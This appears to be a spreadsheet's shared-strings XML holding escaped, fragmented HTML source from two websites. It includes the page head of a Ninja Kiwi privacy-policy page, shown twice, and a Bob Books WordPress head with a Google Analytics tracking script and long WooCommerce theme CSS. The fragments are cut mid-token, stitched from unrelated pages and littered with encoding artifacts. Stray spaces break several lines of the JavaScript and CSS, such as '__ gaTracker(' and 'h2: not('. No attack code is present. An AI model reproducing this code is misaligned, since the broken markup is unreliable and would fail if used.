						                    spaceBetween: 15,
						                },
						            }
						        });
						    &lt;/script&gt;
&lt;script&gt;
				        //</t>
  </si>
  <si>
    <t xml:space="preserve">Initialise all tooltips
				        $(function () {
				            $('[data-toggle="tooltip"]').tooltip()
				        })
				     &lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
 &lt;title&gt;Ninja Kiwi&lt;/title&gt;
&lt;link rel="canonical" href="https://ninjakiwi.com/privacy_policy"&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;
&lt;link rel="icon" type="image/png" href="/website/NKSiteDesign/img/favicon_32.ico"&gt;
&lt;link rel="stylesheet" href="https://cdn.nkstatic.com/website/bootstrap/bootstrap.min.css" crossorigin="anonymous"&gt;
&lt;link href="https://fonts.googleapis.com/ css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&amp;display=swap" rel="stylesheet"&gt; 
&lt;link rel="stylesheet" href="https://unpkg.com/swiper@6.8.4/swiper-bundle.min.css"&gt;
&lt;link rel="stylesheet" type="text/css" href="/website/style/animate.css" crossorigin="anonymous"&gt;
&lt;link rel="stylesheet" href="//cdn.nkstatic.com/website/style/all.css" crossorigin="anonymous"&gt;
&lt;link href="https://vjs.zencdn.net/7.8.4/video-js.css" rel="stylesheet" /&gt;
&lt;link rel="stylesheet" href="https://cdn.nkstatic.com/website/style/styles.min.css" crossorigin="anonymous"&gt;
&lt;link href="/website/NKSiteDesign/css/all.min.css" rel="stylesheet"&gt; 
&lt;meta content="authenticity_token" name="csrf-param" /&gt;
&lt;meta content="sk1XEiboN3Otl27YX7EqVPB9ZbPkukdiquYnrz3HiYk=" name="csrf-token" /&gt;
&lt;/head&gt;
&lt;body id="-page" data-user="" class="text-light -area"&gt;
&lt;container class="nk-dark bg-dark"&gt;
&lt;div class="header"&gt;
&lt;a href="/" class="header_logo_link"&gt;&lt;img class="header_logo" src="https://assets.ninjakiwi.com/images/Ninja_Kiwi_Logo_Horizontal_NoBG_WhiteText_NoMoto.svg" alt=""&gt;&lt;/a&gt;
&lt;div class="header_nav"&gt;
&lt;a class="nav_link" href="/"&gt;Home&lt;/a&gt;
&lt;a class="nav_link" href="" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"&gt;Games &lt;i style="opacity: 0.5;" class="fas fa-fw fa-caret-down"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;div class="dropdown-menu"&gt;
&lt;a class="dropdown-item" href="/our-games"&gt;Our Games&lt;/a&gt;
&lt;div class="dropdown-divider"&gt;&lt;/div&gt;
&lt;a class="dropdown-item" href="/archive"&gt;Web Game Archive&lt;/a&gt;
&lt;/div&gt;
&lt;a class="nav_link" href="/blog"&gt;Blog&lt;/a&gt;
&lt;a class="nav_link" href="/videos"&gt;Watch&lt;/a&gt;
&lt;a class="nav_link" href="https://store.ninjakiwi.com/"&gt;Merch&lt;/a&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/support" target="_blank"&gt;Support&lt;/a&gt;
&lt;/div&gt;
&lt;div class="header_socials"&gt;
&lt;div class="header_socials_icons"&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/insta" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Follow us on Instagram"&gt;&lt;i class="nav_icon fab fa-fw fa-instagram"&gt;&lt;/i&gt;&lt;/a&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
 &lt;title&gt;Ninja Kiwi&lt;/title&gt;
&lt;link rel="canonical" href="https://ninjakiwi.com/privacy_policy"&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;
&lt;link rel="icon" type="image/png" href="/website/NKSiteDesign/img/favicon_32.ico"&gt;
&lt;link rel="stylesheet" href="https://cdn.nkstatic.com/website/bootstrap/bootstrap.min.css" crossorigin="anonymous"&gt;
&lt;link href="https://fonts.googleapis.com/ css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&amp;display=swap" rel="stylesheet"&gt; 
&lt;link rel="stylesheet" href="https://unpkg.com/swiper@6.8.4/swiper-bundle.min.css"&gt;
&lt;link rel="stylesheet" type="text/css" href="/website/style/animate.css" crossorigin="anonymous"&gt;
&lt;link rel="stylesheet" href="//cdn.nkstatic.com/website/style/all.css" crossorigin="anonymous"&gt;
&lt;link href="https://vjs.zencdn.net/7.8.4/video-js.css" rel="stylesheet" /&gt;
&lt;link rel="stylesheet" href="https://cdn.nkstatic.com/website/style/styles.min.css" crossorigin="anonymous"&gt;
&lt;link href="/website/NKSiteDesign/css/all.min.css" rel="stylesheet"&gt; 
&lt;meta content="authenticity_token" name="csrf-param" /&gt;
&lt;meta content="j0ZMqA21OrM4fcpo0RtysXYiBpowr6r9aIz4wLfiwds=" name="csrf-token" /&gt;
&lt;/head&gt;
&lt;body id="-page" data-user="" class="text-light -area"&gt;
&lt;container class="nk-dark bg-dark"&gt;
&lt;div class="header"&gt;
&lt;a href="/" class="header_logo_link"&gt;&lt;img class="header_logo" src="https://assets.ninjakiwi.com/images/Ninja_Kiwi_Logo_Horizontal_NoBG_WhiteText_NoMoto.svg" alt=""&gt;&lt;/a&gt;
&lt;div class="header_nav"&gt;
&lt;a class="nav_link" href="/"&gt;Home&lt;/a&gt;
&lt;a class="nav_link" href="" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"&gt;Games &lt;i style="opacity: 0.5;" class="fas fa-fw fa-caret-down"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;div class="dropdown-menu"&gt;
&lt;a class="dropdown-item" href="/our-games"&gt;Our Games&lt;/a&gt;
&lt;div class="dropdown-divider"&gt;&lt;/div&gt;
&lt;a class="dropdown-item" href="/archive"&gt;Web Game Archive&lt;/a&gt;
&lt;/div&gt;
&lt;a class="nav_link" href="/blog"&gt;Blog&lt;/a&gt;
&lt;a class="nav_link" href="/videos"&gt;Watch&lt;/a&gt;
&lt;a class="nav_link" href="https://store.ninjakiwi.com/"&gt;Merch&lt;/a&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/support" target="_blank"&gt;Support&lt;/a&gt;
&lt;/div&gt;
&lt;div class="header_socials"&gt;
&lt;div class="header_socials_icons"&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/insta" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Follow us on Instagram"&gt;&lt;i class="nav_icon fab fa-fw fa-instagram"&gt;&lt;/i&gt;&lt;/a&gt;
</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
&lt;link rel="pingback" href="https://bobbooks.com/xmlrpc.php"&gt;
&lt;title&gt;Privacy Policy &amp;#8211; Bob Books&lt;/title&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;script&gt; window._wca = window._wca ||</t>
  </si>
  <si>
    <t>[];&lt;/script&gt;_x005F_x000D_
&lt;link rel='dns-prefetch' href='//stats.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//st.poynt.net' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Bob Books &amp;raquo; Feed" href="https://bobbooks.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Bob Books &amp;raquo; Comments Feed" href="https://bobbooks.com/comments/feed/" /&gt;
&lt;!-- This site uses the Google Analytics by MonsterInsights plugin v7.10.4 - Using Analytics tracking - https://www.monsterinsights.com/ --&gt;_x005F_x000D_
 &lt;script type="text/javascript" data-cfasync="false"&gt;_x005F_x000D_
	var mi_version         = '7.10.4';_x005F_x000D_
	var mi_track_user      = true;_x005F_x000D_
	var mi_no_track_reason = '';_x005F_x000D_
	_</t>
  </si>
  <si>
    <t>x000D_
	var disableStr = 'ga-disable-UA-128980676-1';_x005F_x000D_
_x005F_x000D_
	/ * Function to detect opted out users */_x005F_x000D_
	function __gaTrackerIsOptedOut() {_x005F_x000D_
		return document.cookie.indexOf(disableStr + '=true') &gt; -1;_x005F_x000D_
	}_x005F_x000D_
_x005F_x000D_
	/*</t>
  </si>
  <si>
    <t>Disable tracking if the opt-out cookie exists. */_x005F_x000D_
	if ( __gaTrackerIsOptedOut() ) {_x005F_x000D_
		window[disableStr] = true;_x005F_x000D_
	}_x005F_x000D_
_x005F_x000D_
	/* Opt-out function */_x005F_x000D_
	function __gaTrackerOptout() {_x005F_x000D_
	  document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';_x005F_x000D_
	  window[disableStr] = true;_x005F_x000D_
	}_x005F_x000D_
	_x005F_x000D_
	if ( mi_track_user ) {_x005F_x000D_
		(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){_x005F_x000D_
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),_x005F_x000D_
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)_x005F_x000D_
		})(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker');_x005F_x000D_
_x005F_x000D_
		__gaTracker('create', 'UA-128980676-1', 'auto');
		__ gaTracker('set', 'forceSSL', true);
		__</t>
  </si>
  <si>
    <t>gaTracker('require', 'ec');
		__ gaTracker('require', 'displayfeatures');
		__gaTracker('send','pageview');
	} else {_x005F_x000D_
		console.log( "" );_x005F_x000D_
		(function() {_x005F_x000D_
			/* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */_x005F_x000D_
			var noopfn = function() {_x005F_x000D_
				return null;_x005F_x000D_
			};_x005F_x000D_
			var noopnullfn = function() {_x005F_x000D_
				return null;_x005F_x000D_
			};_x005F_x000D_
			var Tracker = function() {_x005F_x000D_
				return null;_x005F_x000D_
			};_x005F_x000D_
			var p = Tracker.prototype;_x005F_x000D_
			p.get = noopfn;_x005F_x000D_
			p.set = noopfn;_x005F_x000D_
			p.send = noopfn;_x005F_x000D_
			var __ gaTracker = function() {_x005F_x000D_
				var len = arguments.length;_x005F_x000D_
				if ( len === 0 ) {_x005F_x000D_
					return;_x005F_x000D_
				}_x005F_x000D_
				var f = arguments[len-1];_x005F_x000D_
				if ( typeof f !</t>
  </si>
  <si>
    <t>+ mi_no_track_reason );_x005F_x000D_
					return;_x005F_x000D_
				}_x005F_x000D_
				try {_x005F_x000D_
					f.hitCallback();_x005F_x000D_
				} catch (ex) {_x005F_x000D_
_x005F_x000D_
				}_x005F_x000D_
			};_x005F_x000D_
			__gaTracker.create = function() {_x005F_x000D_
				return new Tracker();_x005F_x000D_
			};_x005F_x000D_
			__gaTracker.getByName = noopnullfn;_x005F_x000D_
			__gaTracker.getAll = function() {_x005F_x000D_
				return [];_x005F_x000D_
			};_x005F_x000D_
			__gaTracker.remove = noopfn;_x005F_x000D_
			window['__gaTracker'] = __gaTracker;_x005F_x000D_
					})();_x005F_x000D_
		}_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;!-- / Google Analytics by MonsterInsights --&gt;_x005F_x000D_
		&lt;script&gt;
			 window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/bobbooks.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.8"}};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[55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&amp;&amp;t.supports[o[r]],"flag"!==o[r]&amp;&amp;(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&amp;&amp;t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&amp;&amp;!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.</t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;style&gt;
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em ! important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css'  href='https://bobbooks.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7.8' media='all' /&gt;
&lt;style id='wp-block-library-inline-css'&gt;
.has-text-align-justify{text-align:justify;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='wp-block-library-theme-css'  href='https://bobbooks.com/wp-includes/css/dist/block-library/theme.min.css?ver=5.7.8' media='all' /&gt;
&lt;link rel='stylesheet' id='wc-block-vendors-style-css'  href='https://bobbooks.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-style.css?ver=5.1.0' media='all' /&gt;
&lt;link rel='stylesheet' id='wc-block-style-css'  href='https://bobbooks.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=5.1.0' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-css'  href='https://bobbooks.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0' media='all' /&gt;
&lt;link rel='stylesheet' id='storefront-gutenberg-blocks-css'  href='https://bobbooks.com/wp-content/themes/storefront/assets/css/base/gutenberg-blocks.css?ver=3.5.0' media='all' /&gt;
&lt;style id='storefront-gutenberg-blocks-inline-css'&gt;
				.wp-block-button__link:not(.has-text-color) {
					color: #333333;
				}
				.wp-block-button__link:not(.has-text-color):hover,
				.wp-block-button__link:not(.has-text-color):focus,
				.wp-block-button__link:not(.has-text-color):active {
					color: #333333;
				}
				.wp-block-button__link:not(.has-background) {
					background-color: #3479c9;
				}
				.wp-block-button__link:not(.has-background):hover,
				.wp-block-button__link:not(.has-background):focus,
				.wp-block-button__link:not(.has-background):active {
					border-color: #1b60b0;
					background-color: #1b60b0;
				}
				.wp-block-quote footer,
				.wp-block-quote cite,
				.wp-block-quote__citation {
					color: #000000;
				}
				.wp-block-pullquote cite,
				.wp-block-pullquote footer,
				.wp-block-pullquote__citation {
					color: #000000;
				}
				.wp-block-image figcaption {
					color: #000000;
				}
				.wp-block-separator.is-style-dots::before {
					color: #313751;
				}
				.wp-block-file a.wp-block-file__button {
					color: #333333;
					background-color: #3479c9;
					border-color: #3479c9;
				}
				.wp-block-file a.wp-block-file__button:hover,
				.wp-block-file a.wp-block-file__button:focus,
				.wp-block-file a.wp-block-file__button:active {
					color: #333333;
					background-color: #1b60b0;
				}
				.wp-block-code,
				.wp-block-preformatted pre {
					color: #000000;
				}
				.wp-block-table:not( .has-background ):not( .is-style-stripes ) tbody tr:nth-child(2n) td {
					background-color: #d4fdfd;
				}
				.wp-block-cover .wp-block-cover__inner-container h1:not(.has-text-color),
				.wp-block-cover .wp-block-cover__inner-container h2: not(.has-text-color),
				.wp-block-cover .wp-block-cover__inner-container h3:not(.has-text-color),
				.wp-block-cover .wp-block-cover__inner-container h4:not(.has-text-color),
				</t>
  </si>
  <si>
    <t>.wp-block-cover .wp-block-cover__inner-container h5: not(.has-text-color),
				.wp-block-cover .wp-block-cover__inner-container h6:not(.has-text-color) {
					color: #000000;
				}
				.wc-block-components-price-slider__range-input-progress,
				.rtl .wc-block-components-price-slider__range-input-progress {
					--range-color: #1e73be;
				}
				/</t>
  </si>
  <si>
    <t>* Target only IE11 */
				@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
					.wc-block-components-price-slider__range-input-progress {
						background: #1e73be;
					}
				}
				.wc-block-components-button:not(.is-link) {
					background-color: #2437e5;
					color: #ffffff;
				}
				.wc-block-components-button:not(.is-link):hover,
				.wc-block-components-button:not(.is-link):focus,
				.wc-block-components-button:not(.is-link):active {
					background-color: #0b1ecc;
					color: #ffffff;
				}
				.wc-block-components-button:not(.is-link):disabled {
					background-color: #2437e5;
					color: #ffffff;
				}
				.wc-block-cart__submit-container {
					background-color: #d6ffff;
				}
				.wc-block-cart__submit-container::before {
					color: rgba(179,220,220,0.5);
				}
				.wc-block-components-order-summary-item__quantity {
					background-color: #d6ffff;
					border-color: #000000;
					box-shadow: 0 0 0 2px #d6ffff;
					color: #000000;
				}
&lt;/style&gt;
&lt;link rel='stylesheet' id='pac-styles-css'  href='https://bobbooks.com/wp-content/plugins/woocommerce-product-archive-customiser/assets/css/pac.css?ver=5.7.8' media='all' /&gt;
&lt;link rel='stylesheet' id='pac-layout-styles-css'  href='https://bobbooks.com/wp-content/plugins/woocommerce-product-archive-customiser/assets/css/layout.css?ver=5.7.8' media='only screen and (min-width: 768px)' /&gt;
&lt;style id='woocommerce-inline-inline-css'&gt;
.woocommerce form .form-row .required { visibility: visible; }
&lt;/style&gt;
&lt;link rel='stylesheet' id='metorik-css-css'   href='https://bobbooks.com/wp-content/plugins/metorik-helper/assets/css/metorik.css?ver=1.5.1' media='all' /&gt;
&lt;link rel='stylesheet' id='storefront-style-css'  href='https://bobbooks.com/wp-content/themes/storefront/style.css?ver=3.5.0' media='all' /&gt;
&lt;style id='storefront-style-inline-css'&gt;
			.main-navigation ul li a,
			.site-title a,
			ul.menu li a,
			.site-branding h1 a,
			button.menu-toggle,
			button.menu-toggle:hover,
			.handheld-navigation .dropdown-toggle {
				color: #ffffff;
			}
			button.menu-toggle,
			button.menu-toggle:hover {
				border-color: #ffffff;
			}
			.main-navigation ul li</t>
  </si>
  <si>
    <t>a:hover,
			.main-navigation ul li:hover &gt; a,
			.site-title a:hover,
			.site-header ul.menu li.current-menu-item &gt; a {
				color: #ffffff;
			}
			table:not( .has-background ) th {
				background-color: #cff8f8;
			}
			table:not( .has-background ) tbody td {
				background-color: #d4fdfd;
			}
			table:not( .has-background ) tbody tr:nth-child(2n) td,
			fieldset,
			fieldset legend {
				background-color: #d2fbfb;
			}
			.site-header,
			.secondary-navigation ul ul,
			.main-navigation ul.menu &gt; li.menu-item-has-children:after,
			.secondary-navigation ul.menu ul,
			.storefront-handheld-footer-bar,
			.storefront-handheld-footer-bar ul li &gt; a,
			.storefront-handheld-footer-bar ul li.search .site-search,
			button.menu-toggle,
			button.menu-toggle:hover {
				background-color: #29c2d1;
			}
			p.site-description,
			.site-header,
			.storefront-handheld-footer-bar {
				color: #ffffff;
			}
			button.menu-toggle:after,
			button.menu-toggle:before,
			button.menu-toggle span:before {
				background-color: #ffffff;
			}
			h1, h2, h3, h4, h5, h6, .wc-block-grid__product-title {
				color: #313751;
			}
			.widget h1 {
				border-bottom-color: #313751;
			}
			body,
			.secondary-navigation a {
				color: #000000;
			}
			.widget-area .widget a,
			.hentry .entry-header .posted-on a,
			.hentry .entry-header .post-author a,
			.hentry .entry-header .post-comments a,
			.hentry .entry-header .byline a {
				color: #050505;
			}
			a {
				color: #1e73be;
			}
			a:focus,
			button:focus,
			.button.alt:focus,
			input:focus,
			textarea:focus,
			input[type="button"]:focus,
			input[type="reset"]:focus,
			input[type="submit"]:focus,
			input[type="email"]:focus,
			input[type="tel"]:focus,
			input[type="url"]:focus,
			input[type="password"]:focus,
			input[type="search"]:focus {
				outline-color: #1e73be;
			}
			button, input[type="button"], input[type="reset"], input[type="submit"], .button, .widget a.button {
				background-color: #3479c9;
				border-color: #3479c9;
				color: #333333;
			}
			button:hover, input[type="button"]:hover, input[type="reset"]:hover, input[type="submit"]:hover, .button:hover, .widget a.button:hover {
				background-color: #1b60b0;
				border-color: #1b60b0;
				color: #333333;
			}
			button.alt, input[type="button"].alt, input[type="reset"].alt, input[type="submit"].alt, .button.alt, .widget-area .widget a.button.alt {
				background-color: #2437e5;
				border-color: #2437e5;
				color: #ffffff;
			}
			button.alt:hover, input[type="button"].alt:hover, input[type="reset"].alt:hover, input[type="submit"].alt:hover, .button.alt:hover, .widget-area .widget a.button.alt:hover {
				background-color: #0b1ecc;
				border-color: #0b1ecc;
				color: #ffffff;
			}
			.pagination .page-numbers li .page-numbers.current {
				background-color: #bde6e6;
				color: #000000;
			}
			#comments .comment-list .comment-content .comment-text {
				background-color: #cff8f8;
			}
			.site-footer {
				background-color: #007389;
				color: #ffffff;
			}
			.site-footer a:not(.button):not(.components-button) {
				color: #ffffff;
			}
			.site-footer .storefront-handheld-footer-bar a:not(.button):not(.components-button) {
				color: #ffffff;
			}
			.site-footer h1, .site-footer h2, .site-footer h3, .site-footer h4, .site-footer h5, .site-footer h6, .site-footer .widget .widget-title, .site-footer .widget .widgettitle {
				color: #ffffff;
			}
			.page-template-template-homepage.has-post-thumbnail .type-page.has-post-thumbnail .entry-title {
				color: #000000;
			}
			.page-template-template-homepage.has-post-thumbnail .type-page.has-post-thumbnail .entry-content {
				color: #000000;
			}
			@media screen and ( min-width: 768px ) {
				.secondary-navigation ul.menu a:hover {
					color: #ffffff;
				}
				.secondary-navigation ul.menu a {
					color: #ffffff;
				}
				.main-navigation ul.menu ul.sub-menu,
				.main-navigation ul.nav-menu ul.children {
					background-color: #1ab3c2;
				}
				.site-header {
					border-bottom-color: #1ab3c2;
				}
			}
&lt;/style&gt;
&lt;link rel='stylesheet' id='storefront-icons-css'  href='https://bobbooks.com/wp-content/themes/storefront/assets/css/base/icons.css?ver=3.5.0' media='all' /&gt;
&lt;link rel='stylesheet' id='storefront-fonts-css'  href='https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C300%2C300italic%2C400italic%2C600%2C700%2C900&amp;#038;subset=latin%2Clatin-ext&amp;#038;ver=3.5.0' media='all' /&gt;
&lt;link rel='stylesheet' id='storefront-jetpack-widgets-css'  href='https://bobbooks.com/wp-content/themes/storefront/assets/css/jetpack/widgets.css?ver=3.5.0' media='all' /&gt;
&lt;link rel='stylesheet' id='wpcw-css'  href='https://bobbooks.com/wp-content/plugins/contact-widgets/assets/css/style.min.css?ver=1.0.1' media='all' /&gt;
&lt;link rel='stylesheet' id='mwc-payments-payment-form-css'  href='https://bobbooks.com/wp-content/mu-plugins/gd-system-plugin/plugins/mwc-core/assets/css/payments/payment-form.css' media='all' /&gt;
&lt;link rel='stylesheet' id='sv-wc-payment-gateway-payment-form-v5_10_3-css'  href='https://bobbooks.com/wp-content/plugins/woocommerce-gateway-authorize-net-cim/vendor/skyverge/wc-plugin-framework/woocommerce/payment-gateway/assets/css/frontend/sv-wc-payment-gateway-payment-form.min.css?ver=5.10.3' media='all' /&gt;
&lt;link rel='stylesheet' id='storefront-woocommerce-style-css'  href='https://bobbooks.com/wp-content/themes/storefront/assets/css/woocommerce/woocommerce.css?ver=3.5.0' media='all' /&gt;
&lt;style id='storefront-woocommerce-style-inline-css'&gt;
@font-face {
				font-family: star;
				src: url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//star.eot);
				src:
					url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//star.eot?#iefix) format("embedded-opentype"),
					url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//star.woff) format("woff"),
					url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//star.ttf) format("truetype"),
					url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//star.svg#star) format("svg");
				font-weight: 400;
				font-style: normal;
			}
			@font-face {
				font-family: WooCommerce;
				src: url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//WooCommerce.eot);
				src:
					url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//WooCommerce.eot?#iefix) format("embedded-opentype"),
					url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//WooCommerce.woff) format("woff"),
					url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//WooCommerce.ttf) format("truetype"),
					url(https://bobbooks.com/wp-content/plugins/woocommerce/assets/fonts//WooCommerce.svg#WooCommerce) format("svg");
				font-weight: 400;
				font-style: normal;
			}
			a.cart-contents,
			.site-header-cart .widget_shopping_cart</t>
  </si>
  <si>
    <t>a {
				color: #ffffff;
			}
			a.cart-contents:hover,
			.site-header-cart .widget_shopping_cart a:hover,
			.site-header-cart:hover &gt; li &gt; a {
				color: #ffffff;
			}
			table.cart td.product-remove,
			table.cart td.actions {
				border-top-color: #d6ffff;
			}
			.storefront-handheld-footer-bar ul li.cart .count {
				background-color: #ffffff;
				color: #29c2d1;
				border-color: #29c2d1;
			}
			.woocommerce-tabs ul.tabs li.active a,
			ul.products li.product .price,
			.onsale,
			.wc-block-grid__product-onsale,
			.widget_search form:before,
			.widget_product_search form:before {
				color: #000000;
			}
			.woocommerce-breadcrumb a,
			a.woocommerce-review-link,
			.product_meta</t>
  </si>
  <si>
    <t>a {
				color: #050505;
			}
			.wc-block-grid__product-onsale,
			.onsale {
				border-color: #000000;
			}
			.star-rating span:before,
			.quantity .plus, .quantity .minus,
			p.stars a:hover:after,
			p.stars a:after,
			.star-rating span:before,
			#payment .payment_methods li input[type=radio]:first-child:checked+label:before {
				color: #1e73be;
			}
			.widget_price_filter .ui-slider .ui-slider-range,
			.widget_price_filter</t>
  </si>
  <si>
    <t>.ui-slider .ui-slider-handle {
				background-color: #1e73be;
			}
			.order_details {
				background-color: #cff8f8;
			}
			.order_details &gt; li {
				border-bottom: 1px dotted #bae3e3;
			}
			.order_details:before,
			.order_details:after {
				background: -webkit-linear-gradient(transparent 0,transparent 0),-webkit-linear-gradient(135deg,#cff8f8 33.33%,transparent 33.33%),-webkit-linear-gradient(45deg,#cff8f8 33.33%,transparent 33.33%)
			}
			#order_review {
				background-color: #d6ffff;
			}
			#payment .payment_methods &gt; li .payment_box,
			#payment .place-order {
				background-color: #d1fafa;
			}
			#payment .payment_methods</t>
  </si>
  <si>
    <t>&gt; li:not(.woocommerce-notice) {
				background-color: #ccf5f5;
			}
			#payment .payment_methods &gt;</t>
  </si>
  <si>
    <t>li:not(.woocommerce-notice):hover {
				background-color: #c7f0f0;
			}
			.woocommerce-pagination .page-numbers li .page-numbers.current {
				background-color: #bde6e6;
				color: #000000;
			}
			.wc-block-grid__product-onsale,
			.onsale,
			.woocommerce-pagination .page-numbers li .page-numbers:not(.current) {
				color: #000000;
			}
			p.stars a:before,
			p.stars a:hover~a:before,
			p.stars.selected a.active~a:before {
				color: #000000;
			}
			p.stars.selected a.active:before,
			p.stars:hover a:before,
			p.stars.selected a:not(.active):before,
			p.stars.selected a.active:before {
				color: #1e73be;
			}
			.single-product div.product .woocommerce-product-gallery .woocommerce-product-gallery__trigger {
				background-color: #3479c9;
				color: #333333;
			}
			.single-product div.product .woocommerce-product-gallery .woocommerce-product-gallery__trigger:hover {
				background-color: #1b60b0;
				border-color: #1b60b0;
				color: #333333;
			}
			.button.added_to_cart:focus,
			.button.wc-forward:focus {
				outline-color: #1e73be;
			}
			.added_to_cart,
			.site-header-cart .widget_shopping_cart a.button,
			.wc-block-grid__products .wc-block-grid__product .wp-block-button__link {
				background-color: #3479c9;
				border-color: #3479c9;
				color: #333333;
			}
			.added_to_cart:hover,
			.site-header-cart .widget_shopping_cart a.button:hover,
			.wc-block-grid__products .wc-block-grid__product .wp-block-button__link:hover {
				background-color: #1b60b0;
				border-color: #1b60b0;
				color: #333333;
			}
			.added_to_cart.alt, .added_to_cart, .widget a.button.checkout {
				background-color: #2437e5;
				border-color: #2437e5;
				color: #ffffff;
			}
			.added_to_cart.alt:hover, .added_to_cart:hover, .widget a.button.checkout:hover {
				background-color: #0b1ecc;
				border-color: #0b1ecc;
				color: #ffffff;
			}
			.button.loading {
				color: #3479c9;
			}
			.button.loading:hover {
				background-color: #3479c9;
			}
			.button.loading:after {
				color: #333333;
			}
			@media screen and ( min-width: 768px ) {
				.site-header-cart .widget_shopping_cart,
				.site-header .product_list_widget li .quantity {
					color: #ffffff;
				}
				.site-header-cart .widget_shopping_cart .buttons,
				.site-header-cart .widget_shopping_cart .total {
					background-color: #1fb8c7;
				}
				.site-header-cart .widget_shopping_cart {
					background-color: #1ab3c2;
				}
			}
				.storefront-product-pagination a {
					color: #000000;
					background-color: #d6ffff;
				}
				.storefront-sticky-add-to-cart {
					color: #000000;
					background-color: #d6ffff;
				}
				.storefront-sticky-add-to-cart a:not(.button) {
					color: #ffffff;
				}
&lt;/style&gt;
&lt;link rel='stylesheet' id='storefront-child-style-css'  href='https://bobbooks.com/wp-content/themes/storefront-child/style.css?ver=2.1.8.1536872964' media='all' /&gt;
&lt;link rel='stylesheet' id='chld_thm_cfg_separate-css'  href='https://bobbooks.com/wp-content/themes/storefront-child/ctc-style.css?ver=5.7.8' media='all' /&gt;
&lt;link rel='stylesheet' id='storefront-woocommerce-bundles-style-css'  href='https://bobbooks.com/wp-content/themes/storefront/assets/css/woocommerce/extensions/bundles.css?ver=3.5.0' media='all' /&gt;
&lt;link rel='stylesheet' id='wc-bundle-style-css'  href='https://bobbooks.com/wp-content/plugins/woocommerce-product-bundles/assets/css/frontend/woocommerce.css?ver=6.7.4' media='all' /&gt;
&lt;link rel='stylesheet' id='custom-css-css'  href='https://bobbooks.com/wp-content/plugins/theme-customisations-master/custom/style.css?ver=5.7.8' media='all' /&gt;
&lt;link rel='stylesheet' id='jetpack_css-css'  href='https://bobbooks.com/wp-content/plugins/jetpack/css/jetpack.css?ver=9.0.2' media='all' /&gt;
&lt;script src='https://bobbooks.com/wp-content/plugins/jquery-manager/assets/js/jquery-2.2.4.min.js' id='jquery-core-js'&gt;&lt;/script&gt;
